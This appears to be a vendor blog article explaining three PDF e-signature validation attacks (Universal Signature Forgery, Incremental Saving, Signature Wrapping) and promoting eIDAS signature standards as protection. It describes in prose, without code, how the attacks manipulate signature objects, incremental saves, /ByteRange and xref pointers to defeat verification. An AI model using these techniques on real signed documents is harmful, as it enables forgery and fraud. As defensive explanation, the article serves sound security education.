5 min read

eIDAS and eSignature Validation Attacks: How to Protect Yourself

eIDAS and eSignature Validation Attacks: How to Protect Yourself

Ensuring that the integrity of an e-signature remains intact is crucial to protecting its attached messages or documents. This article will explain three types of e-signature validation attacks and how they can be avoided by adopting the standards for e-signatures under eIDAS.

eIDAS, the European Regulation for the electronic identification and trust services for electronic transactions, has referenced standards for signature formats used in Advanced Electronic Signatures and Qualified Electronic Signatures that work to protect the integrity of the e-signature and its associated data.

The Real Danger of E-Signature Attacks

New call-to-actionThe use of e-signatures continues to gain acceptance around the globe as a solution that helps not only individuals, but also businesses and government entities facilitate the transfer of data, such as official government documents, medical information, financial information and business contracts. Instead of relying on a hand-written signature, which is not always guaranteed to be secure, a Qualified Electronic Signature is now an accepted method to validate the identity of the signer/sender of aforementioned data and is, by law, accepted by court across the EU internal market.

Unfortunately, as cyber-criminals become more adept at discovering vulnerabilities within information systems, they have discovered methods to launch e-signature validations attacks. Here are three classes of e-signature validation attacks that allow hackers to take advantage of certain vulnerabilities that may exist within some e-signatures.

It is important to note that each attack takes advantage of a missing step within the signature verification process and not on the signature generation. As we will note in the end, if a signature format conforms to the referenced standards, these signature verification algorithms can be produced which are immune to the mentioned attacks.

The classification described below is based on a publication by pdf-insecurity.org.

E-Signature Attack #1 – Universal Signature Forgery (USF)

The goal of a Universal Signature Forgery (USF) attack is to disable the e-signature verification process by manipulating the signature object by adding invalid content to it or removing references to the signature object. This object holds all the information that is needed for signature validation.

Even though the signature object exists and remains within the e-signature, its validation logic is unable to apply the correct cryptographic operations needed to verify the signature because the USF attack has confused the signature validation logic. If the hacker is successful with their USF attack, the online validation logic or view application will display that the e-signature is valid and belongs to a specific individual or entity on its display panel.

E-Signature Attack #2 – Incremental Saving Attack (ISA)

In the instance of an Incremental Saving Attack (ISA), the goal is to make an incremental save to a document by redefining its structure. Therefore, the target of this attack is a PDF document’s incremental saving or incremental updating feature, which when used legitimately allows a user to add annotations to their PDF. These annotations are saved incrementally as a new PDF body after the PDF’s original content. The incremental saving feature is also used for signing the PDF and allows for the signature object to be appended to its original file content.

Normally, any alterations after a document has been signed would trigger a warning that the document had been tampered with. However, when conducting an ISA attack, the attacker might add additional content, such as new pages or annotations to an already signed PDF. Technically, this breach is not attack. Instead, it is an exploit of the PDF’s incremental saving feature. However, the vulnerability takes place when the signature’s validation logic does not detect that the content within the PDF file has been tampered with. The unsigned content that has been added after the signing of the document is simply seen as an update by the individual or entity that originally created the document’s e-signature. A successful ISA attack will result in new content/body updates being shown, while signature verification processes will remain unaware that modifications or updates have been made to the PDF document.

E-Signature Attack #3 – Signature Wrapping (SWA)

A Signature Wrapping (SWA) attack uses a unique approach to bypass a PDF’s signature protection without accessing its incremental saving feature. It does thing by moving the second part of the signed /ByteRange to the end of the breached document. Meanwhile, the attacker then reuses the xref pointer within the document’s signed trailer to reference his manipulated xref. In some instances, the attacker may also wrap the relocated second part with a stream object or dictionary to prevent it from being processed by the PDF’s or the online signature protection feature.

In a successful SWA attack, an attacker can add malicious unsigned objects into the document. If he has chosen to wrap the relocated second part, these objects can be placed before or after the manipulated xref. If no wrapping is added, the malicious objects would be placed after the manipulated xref. Depending on the PDF viewer, the attacker may copy the file’s last trailer and place it after his manipulated xref to allow the PDF file to be opened and to bypass signature verification without the manipulations to be detected.

eIDAS Standards Provides Enhanced Protection Against E-Signature Attacks

The eIDAS referenced standards include requirements which goes beyond the minimum requirement for PDF signatures. With these additional requirements, signature verification algorithms can easily be implemented to thwart attacks that would otherwise go unnoticed through normal PDF or online signature verification processes. eIDAS provides guidelines for the use of advanced electronic and qualified electronic signatures that add to the protections that are available within PDF software. Under the eIDAS legislation, all EU member states are required to recognize the validity of qualified and advanced electronic signatures that comply with its set standards.

Advanced electronic signatures must meet certain requirements that ensure their authenticity in order to be considered valid. The signature must be able to identify and be uniquely link to its signatory.

The signatures must be created with electronic signature data that is under the sole control of the signatory. Additionally, that electronic signature data must be able to identify if any tampering of data has occurred after the signature has been created.

The integrity of a qualified e-signature can be assured when it meets all eIDAS requirements and is based on a qualified certificate issued by an EU member state. Qualified electronic signatures are validated with certificates that have been issued through a qualified trust service provider. That provider must verify the signer’s identity before issuing a certificate.

A potential successful attack on the validation of a signature can depend on how the signature is created as well as how stringent the validation process is. Because of the nature of standard PDF software and its updating features, it leaves e-signatures vulnerable to attack. But these vulnerabilities can be mitigated by adopting the eIDAS referenced standards for Advanced or Qualified Electronic Signatures.


Download white paper

References and Further Reading